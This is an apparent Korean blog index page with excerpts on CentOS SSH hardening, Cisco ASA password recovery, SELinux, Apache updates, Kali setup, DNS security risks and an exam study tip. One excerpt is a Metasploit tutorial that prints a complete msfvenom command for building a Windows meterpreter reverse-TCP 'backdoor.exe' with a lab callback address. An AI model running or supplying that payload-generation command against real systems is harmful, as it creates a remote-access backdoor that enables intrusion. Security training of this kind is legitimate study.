본문 바로가기

정보

CentOS7에서 SSH 포트 변경 https://www.manualfactory.net/10151 CentOS 7 / SSH / 포트 변경하는 방법 리눅스 서버에 SSH 접속을 하는 공격이 있습니다. SSH Brute Force라고 하는데, 여러 아이디와 비밀번호로 로그인을 시도하는 공격입니다. 이 공격을 방어하는 방법은 여러가지가 있습니다. root 계정으로 로그인 못하게 하기 암호를 복잡하게 만들기 [...] www.manualfactory.net 더보기
Cisco ASA 패스워드 recovery Password Recovery Procedure To recover passwords for the ASA, perform the following steps: Step 1 Connect to the ASA console port according to the instructions in "Accessing the Command-Line Interface" section. Step 2 Power off the ASA, and then power it on. Step 3 After startup, press the Escape key when you are prompted to enter ROMMON mode. Step 4 To update the configuration register value, e.. 더보기
PHP로 시스템 로그 쓰기 시 권한 오류(Permission Denied) 해결 CentOS7의 apache-php 환경에서 로그를 남기려고 하는데, 계속 아래와 같은 오류를 발생하였다. PHP Warning: error_log(/flag_log/flag_test.log): failed to open stream: Permission denied 로그 파일 생성 및 쓰기가 되지 않는 것은 당연... 당연히 디렉토리 및 파일 권한에 관련된 문제로 생각해서 파일 권한 및 소유자 변경을 아무리 어떤 방식으로 해도 해결이 되지 않았다. 결국 찾은 문제는 SELinux /etc/selinux/config 파일은 아래와 같다.# This file controls the state of SELinux on the system. # SELINUX= can take one of these three.. 더보기
yum 으로 아파치 웹서버 최신 버전 업데이트 하기 리눅스 CentOS 7 기준, yum으로 아파치 웹서버를 설치하면 최신버전이 설치되지 않는다. (2.4.6 버전 설치) 최신버전은 드러나지 않은 버그들이 존재할 수 있기에 그런것이지만 yum으로 설치한 아파치 버전도 보안 취약점이 존재하였기에 최신 버전으로 업데이트 하기로 하였다. 참고로 현재(2018년 9월) 아파치 웹서버의 최신 버전은 2.4.34(relased 2018-07-16) 이다. # yum info httpd --> 현재 설치된 httpd 버전 확인 기본 yum 저장소에는 최신 버전의 아파치 웹서버를 찾을 수 없기 때문에 CodeIT 에서 만든 커스텀 저장소(repo)를 사용해야 한다. 이를 사용하기 위해 EPEL을 활성화 해야 한다. # yum install -y epel-release .. 더보기
한국사능력검정시험 긴급 벼락치기 팁(3급) 아래 내용은 한국사 시험 준비 방법으로 정말 추천하지 않습니다. 중급의 경우는 비교적 수월하게 합격이 가능하지만 시험에 임박하도록 준비를 하지 못해 곤란한 분들께작은 도움이라도 되지 않을까 싶어 나름의 팁을 공유합니다. 사실 대단한 방법도 아닙니다. 다시 한번 강조하지만 절대로 추천하는 방법은 아닙니다. 바람직하지도 않구요. '-';; 특별한 결심 없이 신청해놓은 40회 한국사능력검정시험 중급.이런저런 핑계에 공부는 시작도 못하고 시험을 볼까말까 고민하다가결국 하루 전날이 되어서야 그래도 시험이라도 봐보자라는 마음에 벼락치기를 시작하였다. 아무리 중급이라고는 하나 하룻밤에 공부하기에는 무리가 있는 도전이긴 했다. 평소에 역사에 대해 관심을 갖고 익숙한 상태였으면 별 문제가 없었겠지만, 거의 20여년 만에.. 더보기
[메타익스플로잇] 간단한 악성코드 생성 (msfvenom) * msfvenom : 메타익스플로잇 프레임워크의 악성코드 생성 명령어 * msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.138 lport=4444 -f exe -o /root/Desktop/backdoor.exe - -p 옵션 : payload, 보안에서 payload는 악성코드의 일부분. (공격코드) - windows/meterpreter/reverse_tcp : 이미 만들어놓은 payload . 윈도우(운영체제) - 메타익스플로잇 인터프리터(페이로드 종류) - 역으로 tcp 접속(커넥션 방식) - lhost 및 lport :서버 아이피 및 포트로 -p 옵션의 옵션 - -f 옵션 : 파일포맷 - -o 옵션 : 아웃풋 경로 root@kal.. 더보기
칼리/우분투 리눅스 기본 환경 설정 (VMWare 환경) apt install open-vm-tools-desktop // 자동으로 VMWare 화면 크기에 따라 해상도가 맞춰짐, 클립보드 호환 apt install fonts-nanum im-config nabi // 한글폰트, 한글키보드 설정, 한글입력기 등 설치 im-config// 한글키보드 설정 -> 한글설정 후 확인 apt-get update// 설치된 프로그램을 업데이트 or 방금 설치한 프로그램들을 시스템에서 인지하도록 등록 ※ 한영전환은 shift+space * 제어판 -> devices -> keyboard -> 하단 + 클릭 -> shortcut 설정 가능 1) terminal -> command : gnome-terminal -> ctrl+alt+c (예시) 2) web -> firefox.. 더보기
Top6 DNS Security Risks 조치권고 [출처] [보안] Top6 DNS Security Risks 조치권고 (DNS전문가) |작성자 DNS카페운영진 1. 서버리스트 노출 문제점: DNS서버의 기본 보안설정 미비로 많은 기업들 DNS를 통해 전체 서버리스트가 노출 되어 있다. 해결법 : DNS서버에 서버리스트 전송제한 기능 설정 필요 (Zone-transfer 제한기능 설정필요) 메뉴얼 : http://cafe.naver.com/dnspro/292 2. OPEN DNS 취약점에 노출된체 운영중 문제점 : 현재 DNS네임서버운영 기관들의 네임서버를 PC DNS로 설정하면 인터넷이 가능하며, 운영버전에 따라 캐쉬 포이즈닝 공격 취약점이 존재한다. 해결법 : 네임서버 전용과 Cache DNS전용 DNS서버를 구분하여 운영. - DNS취약점 이용 해.. 더보기